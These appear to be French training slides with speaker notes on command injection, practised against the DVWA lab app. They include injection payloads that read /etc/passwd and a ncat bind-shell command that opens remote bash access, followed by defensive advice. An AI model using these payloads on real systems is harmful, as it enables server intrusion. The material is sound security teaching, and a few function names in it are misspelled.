# Command execution

## aka [command injection](https://www.owasp.org/index.php/Command_Injection)


### <i class="fas fa-cogs"></i> CMDi

* paramètres non filtrés
  * la commande est écrite en dur
    * exécution de commandes arbitraires sur le serveur
    * exécutée avec les droits du serveur (thread)

* triviale mais assez rare


### <i class="fa-solid fa-bomb"></i> CMDi / low

* Unix
    * Pipeline 
        * redirection la sortie standard: **|**
        * redirection la sortie d'erreur: **|&**
    * List
        * séparateur de commande: **;** 
        * arrière plan: **&** 
        * et logique: **&&** 
        * ou logique: **||** 


### <i class="fa-solid fa-bomb"></i> CMDi / low

```shell
localhost && ls
; whoami
localhost | id
```

* le réseau est également explorable

Note:
- dvwa à brutforcer
    - non y a le cookie qui coince :/
        - admin:password
        - https://securenetworkmanagement.com/dvwa-and-hydra-login-dvwa-part-1/
- il faut injecter des commandes que le server connait
    - win/unix/linux/bsd/solarix/aix
        - pool de commandes par défaut
- l'enchainement d'exlpoits est laisser à l'imagination du pentester
    - plus il est expérimenté plus il peut créer des attques complexes
        - plus il peut aller loin dans l'exploitation
- Regarder le code
    - Que peut on faire pour améliorer
        - DVWA Security -> medium


### <i class="fa-solid fa-bomb"></i> CMDi / medium

les chaînes de caractères "&&" et ";" sont interdites

```shell
# Pour y voir plus clair
localhost | ls
# Plus intéressant
localhost | pwd & whoami & ps
localhost | uname -a & users & id & w
localhost | cat /etc/group
localhost | cat /etc/passwd
```

Note:
- approche liste noire toujours perdante
    - liste de caractère à échapper
- résultat visible
    - affiché dans la page
        - méga rare
- aveugle
    - certaines pas faciles à détecter
        - adduser / mkdir lors de la création de compte
            - un username se terminant par
                - ;cmd
    - ping réseau
        - on sait si ca a marcher avec le temps d'exécution du ping
            - si ca rame au chargement de la page
                - c'est que le ping est en train de s'exécuter à l'infini
        - sinon sniffer le ping de retour
            - si pas bloqué
        - ping -c3 127.0.0.1 pour mémoire
    - résolution dns d'un domaine maitrisé connu de nous seul
- Regarder le code
    - Que peut on faire pour amliorer
        - DVWA Security -> high


### <i class="fa-solid fa-bomb"></i> CMDi / high

```shell
localhost|ls
```

Note:
-détailler l'expression régulière


### <i class="fa-solid fa-bomb"></i> CMDi / impossible

* l'approche est ici différente
    * on ne cherche plus à éliminer les caractères dangereux
    * on cherche à valider que l'entrée est bien une IP

```shell
$valid = preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $string);
```

Note:
-détailler l'expression régulière


### <i class="fas fa-cogs"></i> bind shell

* ex netcat

```shell
sudo apt install ncat
```

* injecter

```shell
1 | ncat -v -e '/bin/bash' -l -p 8080
```

* puis sur le terminal de l'attaquant

```shell
ncat -v dv.wa 8080
```

* \o/ accès distant à la machine
  * avec les permissions de l'utilisateur www-data

Note:
- revenir en medium ou low security
    - on peut le faire avec cookie manager +
- netcat couteau suisse réseau
    - permet d'écrire sur un port
- soumis a pas mal de condition en vérité
    - marche que dans un sens
        - DMZ coupe tout le sortant
        - reste possible dans ce sens
        - mais faut passer d'eventuels friewalls
        - et netcat peu avoir été supprimé


### <i class="fa fa-medkit"></i> Se préserver

* éviter les commandes [exec](http://php.net/manual/fr/function.exec.php), [shell_exec](http://php.net/manual/fr/function.shell-exec.php), [passtru](http://php.net/manual/fr/function.passthru.php)  ou [system](http://php.net/manual/fr/function.system.php)
* utiliser shell_escape_args() en php
* utliser JSON.parse plutot qu'un eval() de JSON
* utiliser des lib spéacilisées
  * [<i class="fab fa-github"></i> symfony/Filesystem](https://github.com/symfony/Filesystem)
  * [<i class="fab fa-github"></i> symfony/Finder](https://github.com/symfony/Finder)

Note:
- faire marcher le bon sens
- Note le cron de drupal est pourri parce qu'appelable via des url
    - utiliser le cron system


### <i class="fa fa-medkit"></i> Se préserver

* utiliser des listes blanches plutôt que des listes noires
* utiliser cron pour les traitements récurrents
* ne pas installer `netcat` ...
